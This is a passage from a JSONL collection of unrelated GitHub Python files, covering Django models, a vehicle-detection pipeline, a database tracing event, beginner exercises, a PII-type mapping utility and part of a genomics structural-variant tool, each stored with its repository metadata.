create_at = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n color_Choiced = models.CharField(max_length=250,blank=True, null=True)\n size_Choiced = models.CharField(max_length=250,blank=True, null=True)\n\n def __str__(self):\n return self.product.name\n\n @property\n def amount(self):\n if self.product.discount_price:\n return (self.product.discount_price * self.quantity)\n\n else:\n return (self.product.price * self.quantity)\n\n\nclass OrderForm(ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(OrderForm, self).__init__(*args, **kwargs)\n self.fields['note'].required = False\n\n class Meta:\n model = Order\n fields = ['first_name', 'last_name', 'email', 'phone',\n 'address', 'city', 'zip_code', 'note']\n widgets = {\n 'first_name': TextInput(attrs={'class': 'input'}),\n 'last_name': TextInput(attrs={'class': 'input'}),\n 'email': TextInput(attrs={'class': 'input'}),\n 'phone': TextInput(attrs={'class': 'input'}),\n 'address': TextInput(attrs={'class': 'input'}),\n 'city': TextInput(attrs={'class': 'input'}),\n 'zip_code': TextInput(attrs={'class': 'input'}),\n 'note': TextInput(attrs={'class': 'input'}),\n }\n\n\nclass ShopCartForm(ModelForm):\n class Meta:\n model = ShopCart\n fields = ['quantity', 'Gender_Choiced',\n 'color_Choiced', 
'size_Choiced']\n","repo_name":"Hamzahalmasri1/E-mall_Django","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29332628269","text":"#Aprobación de créditos\ningresoenpesos = int(input(\"ingreso en pesos\"))\nañodenacimiento = int(input(\"ingrse el año de nacimiento\"))\nnumerosdehijos = int(input(\"ingrese el numeros de hijos\"))\nañosdepertenenciaenelbanco = int(input(\"años de pertenencia en el banco:\"))\nestadocivil = input(\"S:soltero,C:casado\")\nsiviveencamponoenunaciudad = input(\"U:urbano,R:rural\")\nañosdeedad = 2022-añodenacimiento\nif (103 and 55>añosdeedad>45):\n print(f\"APROBADO\")\nelif (ingresoenpesos>3500000 and añosdepertenenciaenelbanco>5):\n print(f\"APROBADO\")\nelse:\n print(\"RECHAZADO\")\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_f5e311b162834fbd8dcbd38d71ec1b47.py","file_name":"hito1_ej3_f5e311b162834fbd8dcbd38d71ec1b47.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32882188057","text":"import numpy as np\nfrom collections import deque\nfrom moviepy.editor import VideoFileClip\nfrom scipy.ndimage.measurements import label\n\nfrom lesson_utils import search_windows, add_heat, heat_map_bbox, draw_boxes\n\ndef pipeline_single_img(img, windows, clf, **kwargs):\n car_windows = search_windows(img, windows, clf, **kwargs)\n car_hm_bboxes = heat_map_bbox(img, car_windows)\n return draw_boxes(img, car_hm_bboxes)\n\ndef pipeline_video(video_file, out_file, windows, clf, **kwargs):\n clip = VideoFileClip(video_file)\n\n process_image = lambda raw_rgb: pipeline_single_img(raw_rgb, windows, clf, **kwargs)\n clip_lane_line = clip.fl_image(process_image)\n\n clip_lane_line.write_videofile(out_file, audio=False)\n print('File is saved to {}'.format(out_file))\n\nclass BoundingBoxes(object):\n def __init__(self, img_shape, max_frames = 6, threshold=3):\n self._img_shape = img_shape\n self._frame_bboxes = deque([], maxlen=max_frames)\n self._threshold = threshold\n\n def append(self, bboxes):\n self._frame_bboxes.append(bboxes)\n\n def get_heatmap(self):\n heatmap = np.zeros(self._img_shape, dtype=np.float32)\n for frame_bboxes in self._frame_bboxes:\n # Add += 1 for all pixels inside each bbox\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\n for bbox in frame_bboxes:\n heatmap[bbox[0][1]:bbox[1][1], bbox[0][0]:bbox[1][0]] += 1\n\n # apply threshold\n heatmap[heatmap <= self._threshold] = 0\n\n # Visualize the heatmap when displaying\n heatmap = np.clip(heatmap, 0, 255)\n return heatmap\n\n def get_bboxes(self):\n heatmap = self.get_heatmap()\n\n # Find final boxes from heatmap using label function\n labels = label(heatmap)\n\n hm_bboxes = []\n\n # iterate through all detected cars\n for car_number in range(1, labels[1] + 1):\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n hm_bboxes.append(bbox)\n\n return hm_bboxes\n\ndef pipeline_single_img_memory(img, bboxes, windows, clf, **kwargs):\n car_windows = search_windows(img, windows, clf, **kwargs)\n # update new bounding boxes\n bboxes.append(car_windows)\n # integrate over frame\n 
car_hm_bboxes = bboxes.get_bboxes()\n\n return draw_boxes(img, car_hm_bboxes)\n\ndef pipeline_imgs(imgs, windows, clf, bboxes_setting, **kwargs):\n img_shape, max_frames, threshold = bboxes_setting\n bboxes = BoundingBoxes(img_shape, max_frames=max_frames, threshold=threshold)\n\n out_imgs = []\n cmaps = []\n out_labels = []\n for i,img in enumerate(imgs):\n car_windows = search_windows(img, windows, clf, **kwargs)\n hm = np.zeros(img_shape, dtype=np.float32)\n add_heat(hm, car_windows)\n hm = np.clip(hm, 0, 255)\n out_imgs += [draw_boxes(img, car_windows, color=(0.0,0.0,1.0), thick=3), hm]\n cmaps += [None, 'hot']\n out_labels += ['frame {}'.format(i), 'heat-map frame {}'.format(i)]\n\n # update new bounding boxes\n bboxes.append(car_windows)\n\n out_imgs += [draw_boxes(imgs[-1], bboxes.get_bboxes(), thick=3), bboxes.get_heatmap()]\n cmaps += [None, 'hot']\n out_labels += ['last frame', 'heat-map last frame']\n return out_imgs, out_labels, cmaps\n\n\ndef pipeline_video_memory(video, out_file, windows, clf, bboxes_setting, **kwargs):\n if isinstance(video, str):\n clip = VideoFileClip(video)\n elif isinstance(video, VideoFileClip):\n clip = video\n\n\n img_shape, max_frames, threshold = bboxes_setting\n bboxes = BoundingBoxes(img_shape, max_frames=max_frames, threshold=threshold)\n\n process_image = lambda raw_rgb: pipeline_single_img_memory(raw_rgb, bboxes, windows, clf, **kwargs)\n clip_lane_line = clip.fl_image(process_image)\n\n clip_lane_line.write_videofile(out_file, audio=False)\n print('File is saved to {}'.format(out_file))\n\n","repo_name":"minh84/udacity_carnd","sub_path":"CarND-P5-Vehicle-Detection/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"48324633403","text":"\"\"\"\nsqlalchemy events module.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom uuid import uuid4\nimport traceback\n\ntry:\n from psycopg2.extensions import parse_dsn\n\nexcept ImportError:\n def parse_dsn(dsn):\n \"\"\"\n Parse the DSN.\n :param dsn: input DSN.\n :return:\n \"\"\"\n return dict(\n attribute.split('=') for attribute in dsn.split()\n if '=' in attribute\n )\n\nfrom ..trace import trace_factory\nfrom ..event import BaseEvent\nfrom ..utils import database_connection_type, print_debug\n\nMAX_QUERY_SIZE = 2048\n\n\nclass DBAPIEvent(BaseEvent):\n \"\"\"\n Represents base sqlalchemy event.\n \"\"\"\n\n ORIGIN = 'dbapi'\n RESOURCE_TYPE = 'database'\n RESOURCE_OPERATION = None\n\n # mapping SQL commands to words preceding the table name in the query\n # Note: Not supporting advanced syntax of select and delete (as 'delete\n # from only ..')\n _OPERATION_TO_TABLE_NAME_KEYWORD = {\n 'select': 'from',\n 'insert': 'into',\n 'update': 'update',\n 'delete': 'from',\n 'create': 'table'\n }\n\n def __init__(\n self,\n connection,\n cursor,\n _args,\n _kwargs,\n start_time,\n exception\n ):\n \"\"\"\n Initialize.\n :param connection: The SQL engine the event is using\n :param cursor: Cursor object used in the even\n :param args: args passed to called function\n :param kwargs: kwargs passed to called function\n :param start_time: Start timestamp (epoch)\n :param exception: Exception (if occurred)\n \"\"\"\n\n super(DBAPIEvent, self).__init__(start_time)\n self.event_id = 'dbapi-{}'.format(str(uuid4()))\n\n # in case of pg instrumentation we extract data from the dsn property\n if hasattr(connection, 'dsn'):\n dsn = parse_dsn(connection.dsn)\n db_name = 
dsn.get('dbname', '')\n host = dsn.get('host', 'local')\n query = cursor.query\n else:\n query = _args[0]\n host = connection.extract_hostname\n db_name = connection.extract_dbname\n\n self.resource['name'] = db_name if db_name else host\n\n # NOTE: The operation might not be identified properly when\n # using 'WITH' clause\n splitted_query = query.split()\n if not splitted_query:\n print_debug('Cannot extract operation from query {}'.format(query))\n operation = ''\n else:\n operation = splitted_query[0].lower()\n self.resource['operation'] = operation\n # override event type with the specific DB type\n self.resource['type'] = database_connection_type(\n host,\n self.RESOURCE_TYPE\n )\n self.resource['metadata'] = {\n 'Host': host,\n 'Driver': connection.__class__.__module__.split('.')[0],\n 'Table Name': self._extract_table_name(query, operation)\n }\n\n # for select we always want to save the query\n if (\n (operation == 'select') or\n (not trace_factory.metadata_only)\n ):\n self.resource['metadata']['Query'] = query[:MAX_QUERY_SIZE]\n\n if exception is None:\n # Update response data\n self.resource['metadata']['Related Rows Count'] = int(\n cursor.rowcount\n )\n else:\n self.set_exception(exception, traceback.format_exc())\n\n @staticmethod\n def _extract_table_name(query, operation):\n \"\"\"\n Extract the table name from the SQL query string\n :param query: The SQL query string\n :param operation: The SQL operation used in the query\n (SELECT, INSERT, etc.)\n :return: Table name (string), \"\" if couldn't find\n \"\"\"\n\n if operation in DBAPIEvent._OPERATION_TO_TABLE_NAME_KEYWORD:\n keyword = DBAPIEvent._OPERATION_TO_TABLE_NAME_KEYWORD[operation]\n query_words = query.lower().split()\n if keyword in query_words:\n return query.split()[query_words.index(keyword) + 1]\n\n return ''\n\n\nclass DBAPIEventFactory(object):\n \"\"\"\n Factory class, generates dbapi event.\n \"\"\"\n\n @staticmethod\n # pylint: disable=W0613\n def create_event(wrapped, cursor_wrapper, args, kwargs, start_time,\n response, exception):\n \"\"\"\n Create an event according to the given operation.\n :param wrapped:\n :param cursor_wrapper:\n :param args:\n :param kwargs:\n :param start_time:\n :param response:\n :param exception:\n :return:\n \"\"\"\n event = DBAPIEvent(\n cursor_wrapper.connection_wrapper,\n cursor_wrapper,\n args,\n kwargs,\n start_time,\n exception,\n )\n trace_factory.add_event(event)\n","repo_name":"epsagon/epsagon-python","sub_path":"epsagon/events/dbapi.py","file_name":"dbapi.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"77"} +{"seq_id":"1340410213","text":"# Write a program that accepts a sentence and calculate the number of upper case letters and lower case letters.\nsentence = input('Please enter your sentence? 
')\nupperNo, lowerNo = 0, 0\nfor x in sentence:\n if x.isupper():\n upperNo += 1\n elif x.islower():\n lowerNo += 1\nprint(f'UPPER CASE {upperNo}')\nprint(f'LOWER CASE {lowerNo}')\n","repo_name":"ngSunil/python_100","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17471681202","text":"from input_info import print_sizes_for_n\nimport sys\n\n\ndef insert_sort(arr):\n operations = 0\n n = len(arr)\n\n for i in range(1, n):\n operations += 1\n j = i\n while j > 0 and arr[j - 1] > arr[j]:\n operations += 1\n temp = arr[j - 1]\n arr[j - 1] = arr[j]\n arr[j] = temp\n j = j - 1\n\n print_sizes_for_n(n)\n this_function_name = sys._getframe().f_code.co_name\n print(\"Total number of operations for {}: {}\"\n .format(this_function_name, operations))\n return arr\n\n\ndef selection_sort(arr):\n operations = 0\n n = len(arr)\n\n for i in range(0, n):\n operations += 1\n for j in range(i, n):\n operations += 1\n if arr[i] > arr[j]:\n temp = arr[i]\n arr[i] = arr[j]\n arr[j] = temp\n\n print_sizes_for_n(n)\n this_function_name = sys._getframe().f_code.co_name\n print(\"Total number of operations for {}: {}\"\n .format(this_function_name, operations))\n return arr\n\nif __name__ == '__main__':\n # numbers from 1000 to 0 in decreasing order\n arr = list(range(1000, 0, -1))\n\n # passing the list as a value with list[:]\n insert_sort(arr[:])\n selection_sort(arr[:])\n","repo_name":"RadoRado/playground","sub_path":"algos/sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39112491752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('plan', '0008_auto_20150213_1138'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PlanApplied',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('plan', models.ForeignKey(related_name=b'applications', to='plan.Plan')),\n ('user', models.ForeignKey(related_name=b'plans_applied', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='planapplied',\n unique_together=set([('user', 'plan')]),\n ),\n migrations.AddField(\n model_name='plansessionapplied',\n name='application',\n field=models.ForeignKey(related_name=b'sessions', null=True, to='plan.PlanApplied'),\n preserve_default=False,\n ),\n ]\n","repo_name":"La0/runreport","sub_path":"src/plan/migrations/0009_auto_20150216_1048.py","file_name":"0009_auto_20150216_1048.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"9138496942","text":"import pandas as pd \nimport numpy as np \nimport argparse\nimport os\nimport glob\n\nparser = argparse.ArgumentParser(description='Print average metrics over folds')\nparser.add_argument('model_folder', type=str, help='Folder containing subfolders for each fold')\nparser.add_argument('--fallback_folder', type=str, help='Folder to use if best model 
doesn\\'t exist (finetuning case)')\nargs = parser.parse_args()\n\nall_best_metrics = []\nfor subfolder in os.listdir(args.model_folder):\n model_folder = args.model_folder if len(glob.glob(os.path.join(args.model_folder, subfolder, '*best*'))) \\\n else args.fallback_folder\n metrics = pd.read_csv(os.path.join(model_folder, subfolder, 'history.csv'), index_col=0)\n best_metrics = metrics.iloc[metrics['val_total_loss'].idxmin()]\n all_best_metrics.append(best_metrics)\n\nall_best_metrics = pd.DataFrame(all_best_metrics)\navg_best_metrics = all_best_metrics.mean(axis=0)\n#print('Train appear mAP:', avg_best_metrics['train_appear_mAP'])\nprint('Val appear mAP:', avg_best_metrics['val_appear_mAP'])\n#print('Train grade mAP:', avg_best_metrics['train_grade_mAP'])\nprint('Val grade mAP:', avg_best_metrics['val_grade_mAP'])\n\nprint('Val appear AP c0:', avg_best_metrics['val_appear_AP_c0'])\nprint('Val appear AP c1:', avg_best_metrics['val_appear_AP_c1'])\nprint('Val appear AP c2:', avg_best_metrics['val_appear_AP_c2'])\nprint('Val appear AP c3:', avg_best_metrics['val_appear_AP_c3'])\n\nprint('Val grade AP c0:', avg_best_metrics['val_grade_AP_c0'])\nprint('Val grade AP c1:', avg_best_metrics['val_grade_AP_c1'])\nprint('Val grade AP c2:', avg_best_metrics['val_grade_AP_c2'])\n\n# print()\n# print(all_best_metrics[['val_appear_mAP', 'val_grade_mAP']])\n\n# print('Val appear acc:', avg_best_metrics['val_appear_acc'])\n# print('Val grade acc:', avg_best_metrics['val_grade_acc'])\n# print('Val appear auc:', avg_best_metrics['val_appear_auroc'])\n# print('Val grade auc:', avg_best_metrics['val_grade_auroc'])\n ","repo_name":"rish-raghu/RICORD-Classification","sub_path":"code/scripts/metrics/avg_fold_stats.py","file_name":"avg_fold_stats.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20944043384","text":"def add(a,b):\r\n result = a+b\r\n print(result)\r\n\r\ndef sub(a,b):\r\n result = a-b\r\n print(result)\r\n\r\ndef mul(a,b):\r\n result = a*b\r\n print(result)\r\n\r\ndef div(a,b):\r\n result = a/b\r\n print(result)\r\n\r\na = int(input(\"Enter first number: \"))\r\nb = int(input(\"Enter second number: \"))\r\noperation =input(\"Enter the operation: \")\r\n\r\nif operation == \"+\":\r\n add(a,b)\r\nelif operation == \"-\":\r\n sub(a,b)\r\nelif operation == \"*\":\r\n mul(a,b)\r\nelif operation == \"/\":\r\n div(a,b)\r\nelse:\r\n print(\"Invalid input!\")\r\n","repo_name":"kashykashh/calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11725677115","text":"# pylint: disable=broad-except, unused-variable\nfrom typing import Optional\n\nfrom pii_codex.models.aws_pii import AWSComprehendPIIType\nfrom pii_codex.models.azure_pii import AzurePIIType\nfrom pii_codex.models.common import (\n RiskLevel,\n ClusterMembershipType,\n HIPAACategory,\n DHSCategory,\n NISTCategory,\n PIIType,\n MetadataType,\n RiskLevelDefinition,\n)\nfrom pii_codex.models.analysis import RiskAssessment\nfrom pii_codex.models.microsoft_presidio_pii import MSFTPresidioPIIType\n\nfrom pii_codex.utils.file_util import open_pii_type_mapping_csv\n\n\nclass PIIMapper:\n \"\"\"\n Class to map PII types listed as Common Types, Azure Types, AWS Comprehend Types, and Presidio Types\n \"\"\"\n\n def __init__(self):\n self._pii_mapping_data_frame = 
open_pii_type_mapping_csv(\"v1\")\n\n def map_pii_type(self, pii_type: str) -> RiskAssessment:\n \"\"\"\n Maps the PII Type to a full RiskAssessment including categories it belongs to, risk level, and\n its location in the text. This cross-references some of the types listed by Milne et al. (2016)\n\n @param pii_type:\n @return:\n \"\"\"\n\n information_detail_lookup = self._pii_mapping_data_frame[\n self._pii_mapping_data_frame.PII_Type == pii_type\n ]\n\n # Retrieve the risk_level name by the value of the risk definition enum entry\n if information_detail_lookup.empty:\n raise Exception(\n f\"An error occurred while processing the detected entity {pii_type}\"\n )\n\n risk_level_definition = RiskLevelDefinition(\n information_detail_lookup.Risk_Level.item()\n )\n\n return RiskAssessment(\n pii_type_detected=pii_type,\n risk_level=RiskLevel[risk_level_definition.name].value,\n risk_level_definition=risk_level_definition.value,\n cluster_membership_type=ClusterMembershipType(\n information_detail_lookup.Cluster_Membership_Type.item()\n ).value,\n hipaa_category=HIPAACategory[\n information_detail_lookup.HIPAA_Protected_Health_Information_Category.item()\n ].value,\n dhs_category=DHSCategory(\n information_detail_lookup.DHS_Category.item()\n ).value,\n nist_category=NISTCategory(\n information_detail_lookup.NIST_Category.item()\n ).value,\n )\n\n @classmethod\n def convert_common_pii_to_msft_presidio_type(\n cls, pii_type: PIIType\n ) -> MSFTPresidioPIIType:\n \"\"\"\n Converts a common PII Type to a MSFT Presidio Type\n @param pii_type:\n @return:\n \"\"\"\n\n try:\n converted_type = MSFTPresidioPIIType[pii_type.name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n return converted_type\n\n @classmethod\n def convert_common_pii_to_azure_pii_type(cls, pii_type: PIIType) -> AzurePIIType:\n \"\"\"\n Converts a common PII Type to an Azure PII Type\n @param pii_type:\n @return:\n \"\"\"\n try:\n return AzurePIIType[pii_type.name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_common_pii_to_aws_comprehend_type(\n cls,\n pii_type: PIIType,\n ) -> AWSComprehendPIIType:\n \"\"\"\n Converts a common PII Type to an AWS PII Type\n @param pii_type:\n @return:\n \"\"\"\n try:\n return AWSComprehendPIIType[pii_type.name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_azure_pii_to_common_pii_type(cls, pii_type: str) -> PIIType:\n \"\"\"\n Converts an Azure PII Type to a common PII Type\n @param pii_type:\n @return:\n \"\"\"\n try:\n if pii_type == AzurePIIType.USUK_PASSPORT_NUMBER.value:\n # Special case, map to USUK for all US and UK Passport types\n return PIIType.US_PASSPORT_NUMBER\n\n return PIIType[AzurePIIType(pii_type).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_aws_comprehend_pii_to_common_pii_type(\n cls,\n pii_type: str,\n ) -> PIIType:\n \"\"\"\n Converts an AWS PII Type to a common PII Type\n @param pii_type: str from AWS Comprehend (maps to value of AWSComprehendPIIType)\n @return:\n \"\"\"\n try:\n return PIIType[AWSComprehendPIIType(pii_type).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def 
convert_msft_presidio_pii_to_common_pii_type(\n cls,\n pii_type: str,\n ) -> PIIType:\n \"\"\"\n Converts a Microsoft Presidio PII Type to a common PII Type\n @param pii_type: str from Presidio (maps to value of PIIType)\n @return:\n \"\"\"\n try:\n return PIIType[MSFTPresidioPIIType(pii_type).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_metadata_type_to_common_pii_type(\n cls, metadata_type: str\n ) -> Optional[PIIType]:\n \"\"\"\n Converts metadata type str entry to common PII type\n @param metadata_type:\n @return: PIIType\n \"\"\"\n\n try:\n if metadata_type.lower() == \"name\":\n return PIIType.PERSON\n\n if metadata_type.lower() == \"user_id\":\n # If dealing with public data, user_id can be used to pull down\n # social network profile\n return PIIType.SOCIAL_NETWORK_PROFILE\n\n return PIIType[MetadataType(metadata_type.lower()).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this Metadata to PII Type conversion.\"\n )\n","repo_name":"EdyVision/pii-codex","sub_path":"pii_codex/utils/pii_mapping_util.py","file_name":"pii_mapping_util.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"77"} +{"seq_id":"75048198327","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n'''\nBreaKmer target module\n'''\n\n\nimport sys\nimport os\nimport subprocess\nimport shutil\nimport pysam\nimport breakmer.utils as utils\nimport breakmer.assembly.assembler as assembler\nimport breakmer.caller.sv_caller2 as sv_caller\nimport pdb\n\n__author__ = \"Ryan Abo\"\n__copyright__ = \"Copyright 2015, Ryan Abo\"\n__email__ = \"ryanabo@gmail.com\"\n__license__ = \"MIT\"\n\n\ndef pe_meta(aread):\n\n '''\n '''\n\n # First check if read is from a proper paired-end mapping --> <--\n proper_map = False\n overlap_reads = False\n proper_map1 = ((aread.flag == 83) or (aread.flag == 147)) and (aread.tlen < 0)\n proper_map2 = ((aread.flag == 99) or (aread.flag == 163)) and (aread.tlen > 0)\n if proper_map1 or proper_map2:\n proper_map = True\n if abs(aread.tlen) < (2 * len(aread.seq)):\n overlap_reads = True\n return proper_map, overlap_reads\n\n\ndef add_discordant_pe(aread, read_d, bamfile):\n\n '''\n '''\n\n qname = aread.qname\n # Keep discordant read pairs where the map quality is > 0, the paired reads are mapped to different chroms or > 1000 bp apart, and\n # the mate is mapped.\n if aread.mapq > 0 and ((aread.rnext != -1 and aread.tid != aread.rnext) or abs(aread.tlen) > 1000) and not aread.mate_is_unmapped:\n mate_refid = bamfile.getrname(aread.rnext) # Grab the paired read\n # mate_read = None\n # try:\n # mate_read = bamfile.mate(aread)\n # except:\n # print 'Skipping read'\n # pass\n\n # if mate_read is not None:\n # if mate_read.mapq > 0:\n if mate_refid not in read_d['disc']:\n read_d['disc'][mate_refid] = []\n read_d['disc'][mate_refid].append((aread.pos, aread.pnext)) # Store the read position and the mate position\n\n if aread.mapq > 0 and not aread.mate_is_unmapped and aread.tid == aread.mrnm:\n if aread.is_read1:\n read_positions = None\n if aread.is_reverse and aread.mate_is_reverse:\n # reverse -- reverse, samflag 115 (note: only considering read1, read2 samflag 179)\n read_positions = (aread.pos, aread.mpos, 0, 0, qname)\n if aread.mpos < aread.pos:\n read_positions = (aread.mpos, aread.pos, 0, 0, qname)\n read_d['inv_reads'].append(read_positions)\n elif not 
aread.is_reverse and not aread.mate_is_reverse:\n                # forward -- forward = samflag 67 (note: only considering read1, read2 samflag 131)\n                read_positions = (aread.pos, aread.mpos, 1, 1, qname)\n                if aread.mpos < aread.pos:\n                    read_positions = (aread.mpos, aread.pos, 1, 1, qname)\n                read_d['inv_reads'].append(read_positions)\n            elif aread.is_reverse and not aread.mate_is_reverse and aread.pos < aread.mpos:\n                # reverse -- forward = samflag 83 with positive insert (read2 samflag 163 with + insert size)\n                read_positions = (aread.pos, aread.mpos, 0, 1, aread.qname)\n                read_d['td_reads'].append(read_positions)\n            elif not aread.is_reverse and aread.mate_is_reverse and aread.mpos < aread.pos:\n                # reverse -- forward = samflag 99 with - insert (read2 samflag 147 with - insert)\n                read_positions = (aread.mpos, aread.pos, 1, 0, qname)\n                read_d['td_reads'].append(read_positions)\n            if read_positions:\n                read_d['other'].append(read_positions)\n\n\nclass TargetManager(object):\n\n    '''TargetManager class handles all the high level information relating to a target.\n    The analysis is performed at the target level, so this class contains all the information\n    necessary to perform an independent analysis.\n\n    Attributes:\n        params (ParamManager): Parameters for breakmer analysis.\n        logging_name (str): Module name for logging file purposes.\n        name (str): Target name specified in the input bed file.\n        chrom (str): Chromosome ID as specified in the input bed file.\n        start (int): Genomic position for the target region (minimum value among all intervals).\n        end (int): Genomic position for the target region (maximum value among all intervals).\n        paths (dict): Contains the analysis paths for this target.\n        files (dict): Dictionary containing paths to file names needed for analysis.\n        read_len (int): Length of a single read.\n        variation (Variation): Stores data for variants identified within the target.\n        regionBuffer (int): Base pairs to add or subtract from the target region end and start locations.\n\n    '''\n\n    def __init__(self, intervals, params):\n\n        '''\n        '''\n\n        self.params = params\n        self.name = None\n        self.chrom = None\n        self.start = None\n        self.end = None\n        self.paths = {}\n        self.files = {}\n        self.disc_reads = None\n        self.sv_reads = None\n        self.cleaned_read_recs = None\n        self.kmer_clusters = []\n        self.kmers = {}\n        self.contigs = []\n        self.results = []\n        self.formatted_results = []\n        self.svs = {'trl':[0, '-'], 'indel':[0, ''], 'rearrangement':[0, '']}\n        self.target_intervals = intervals\n        self.repeat_mask = None\n        self.logging_name = 'breakmer.processor.target'\n        self.call_manager = sv_caller.SVCallManager(params)\n        self.setup()\n\n    def setup(self):\n\n        '''Set up the target object with the input params.\n\n        Define the location (chrom, start, end), file paths, directory paths, and name.\n\n        Args:\n            None\n        Returns:\n            None\n        '''\n\n        for value in self.target_intervals:\n            if not self.name:\n                self.name = value[3]\n            if not self.chrom:\n                self.chrom = value[0]\n            if not self.start:\n                self.start = int(value[1])\n            if not self.end:\n                self.end = int(value[2])\n            if int(value[1]) < self.start:\n                self.start = int(value[1])\n            if int(value[2]) > self.end:\n                self.end = int(value[2])\n\n        '''\n        Create the proper paths for the target analysis.\n\n        Each target analyzed has a set of directories associated with it.\n\n        targets/\n            /\n                data/\n                contigs/\n                kmers/\n        There is a separate directory for each target in the output directory.\n\n        output/\n            /\n        '''\n\n        self.add_path('base', os.path.join(self.params.paths['targets'], self.name))\n        
self.add_path('ref_data', os.path.join(self.params.paths['ref_data'], self.name))\n self.add_path('data', os.path.join(self.paths['base'], 'data'))\n self.add_path('contigs', os.path.join(self.paths['base'], 'contigs'))\n self.add_path('kmers', os.path.join(self.paths['base'], 'kmers'))\n self.add_path('output', os.path.join(self.params.paths['output'], self.name))\n\n # Set reference paths\n if 'keep_repeat_regions' in self.params.opts:\n if not self.params.opts['keep_repeat_regions']:\n if 'repeat_mask_file' not in self.params.opts:\n utils.log(self.logging_name, 'error', 'Keep repeat regions option is false, but no repeat mask bed file provided. All repeat region variants will be reported.')\n self.params.opts['keep_repeat_regions'] = True\n else:\n self.files['rep_mask_fn'] = os.path.join(self.paths['ref_data'], self.name+'_rep_mask.bed')\n\n '''\n Each target has reference files associated with it.\n\n /\n /\n _forward_refseq.fa\n _reverse_refseq.fa\n _forward_refseq.fa_dump\n _reverse_refseq.fa_dump\n '''\n self.files['target_ref_fn'] = [os.path.join(self.paths['ref_data'], self.name + '_forward_refseq.fa'), os.path.join(self.paths['ref_data'], self.name + '_reverse_refseq.fa')]\n\n ref_fa_marker_f = open(os.path.join(self.paths['ref_data'], '.reference_fasta'), 'w')\n ref_fa_marker_f.write(self.params.opts['reference_fasta'])\n ref_fa_marker_f.close()\n\n self.files['ref_kmer_dump_fn'] = [os.path.join(self.paths['ref_data'], self.name + '_forward_refseq.fa_dump'), os.path.join(self.paths['ref_data'], self.name + '_reverse_refseq.fa_dump')]\n\n def get_sv_reads(self):\n\n '''\n '''\n\n self.extract_bam_reads('sv')\n if 'normal_bam_file' in self.params.opts:\n self.extract_bam_reads('norm')\n self.clean_reads('norm')\n\n check = True\n if not self.clean_reads('sv'):\n shutil.rmtree(self.paths['output'])\n check = False\n return check\n\n def setup_read_extraction_files(self, sample_type):\n\n '''\n '''\n\n self.files['%s_fq' % sample_type] = os.path.join(self.paths['data'], self.name + \"_sv_reads.fastq\")\n self.files['%s_sc_unmapped_fa' % sample_type] = os.path.join(self.paths['data'], self.name + \"_sv_sc_seqs.fa\")\n if sample_type == 'sv':\n self.files['sv_bam'] = os.path.join(self.paths['data'], self.name + \"_sv_reads.bam\")\n self.files['sv_bam_sorted'] = os.path.join(self.paths['data'], self.name + \"_sv_reads.sorted.bam\")\n\n def extract_bam_reads(self, sample_type):\n\n '''\n '''\n self.setup_read_extraction_files(sample_type)\n\n bam_type = 'sample'\n if sample_type == 'norm':\n bam_type = 'normal'\n\n utils.log(self.logging_name, 'info', 'Extracting bam 